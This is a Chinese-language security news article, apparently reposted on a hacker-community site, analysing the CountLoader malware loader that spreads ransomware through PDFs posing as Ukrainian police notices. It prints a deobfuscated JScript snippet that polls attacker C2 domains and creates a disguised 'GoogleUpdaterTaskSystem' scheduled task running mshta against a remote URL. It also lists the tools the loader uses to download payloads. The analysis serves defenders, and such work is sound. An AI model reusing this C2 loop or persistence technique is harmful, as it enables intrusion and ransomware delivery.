新型恶意软件加载器“CountLoader”利用PDF文件传播勒索软件

新型恶意软件加载器“CountLoader”利用PDF文件传播勒索软件

近几个月来,安全团队发现了一种复杂的恶意软件加载器,名为CountLoader,它利用武器化的PDF文件来交付勒索软件有效载荷。

CountLoader于2025年8月底首次被发现,与多个俄语网络犯罪集团有关联,包括LockBit、BlackBasta和Qilin的附属机构。

这种加载程序通过伪装成合法文件(通常冒充乌克兰执法部门),利用社会工程学和PDF漏洞链,在目标环境中获取初步立足点。

CountLoader的部署方法围绕着三个不同的版本展开,这些版本分别用JScript(.hta)、.NET和PowerShell编写。

每个变体都具有独特的属性:JScript版本提供最全面的功能,拥有多种下载和执行方法;.NET二进制文件在预设日期后会启用硬编码的终止开关;PowerShell脚本则作为精简的加载器存在,具有反射式内存中执行能力。

Silent Push的分析师指出,所有变体都采用了一种自定义的C2通信协议,该协议利用XOR和Base64加密程序来隐藏其控制流量。

CountLoader的影响远不止于单纯的初始访问。成功执行后,该加载器会采集设备的特定细节(如硬件标识符、域成员身份和防病毒产品的存在情况),以生成唯一的受害者ID。

然后,它会进入持续的C2轮询循环,下载二级有效载荷,如Cobalt Strike信标、Adaptix植入程序和pureHVNC后门。

在东欧拥有加入域的系统的组织一直是主要目标,这表明企业和政府实体是被战略性选择的对象。

新型恶意软件加载器“CountLoader”利用PDF文件传播勒索软件

CountLoader 主要是通过一个伪装成乌克兰国家警察局的基于PDF的钓鱼诱饵进行传播的。这个恶意PDF包含一个嵌入的HTML应用程序对象,该对象会触发mshta.exe来获取并执行JScript加载器。

打开文档后,受害者会看到一个看似官方的通知,指示他们通过嵌入的链接“发起请求”,而该链接会启动加载程序的下载过程。

感染机制

CountLoader的感染机制始于武器化PDF,它利用的是用户交互而非零日漏洞。

该PDF嵌入了一个HTA对象,点击时会调用Windows的mshta引擎。

这个HTA脚本使用免费的JavaScript混淆器进行了混淆处理,包含大约850行代码。

新型恶意软件加载器“CountLoader”利用PDF文件传播勒索软件

经过反混淆处理后,负责C2通信的主循环变得清晰可见:

for (let i = 1; i <= 10; i++) {
    let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
    let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
    if (response === "success") {
        connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
        break;
    }
}
// Scheduled task creation for persistence
CreateScheduledTask({
    name: "GoogleUpdaterTaskSystem",
    command: `mshta https://${envVar}.example.com/start`,
    delay: "PT10M"
});

成功建立连接后,CountLoader会利用HTTP POST请求以及从命令与控制服务器获取的自定义Bearer令牌来获取任务。

这些任务包括通过WinHTTP、MSXML2、Curl、Bitsadmin或Certutil下载可执行文件,展示了加载器的适应性和深厚的系统知识。

任务执行后,CountLoader会向服务器报告完成情况,确保实现可靠的任务管理。

这种感染流程凸显了CountLoader的设计特点,它是一种高度模块化且具有持久性的加载器,能够分发各种勒索软件和后期利用工具,同时通过混淆和加密通信来躲避检测。

版权声明·<<<---红客联盟--->>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
安全威胁

新的钓鱼攻击瞄准Facebook用户以窃取登录凭证

2025-9-21 3:05:01

安全威胁

HubSpot的Jinjava引擎漏洞使数千个网站面临远程代码执行攻击风险

2025-9-21 3:10:36

搜索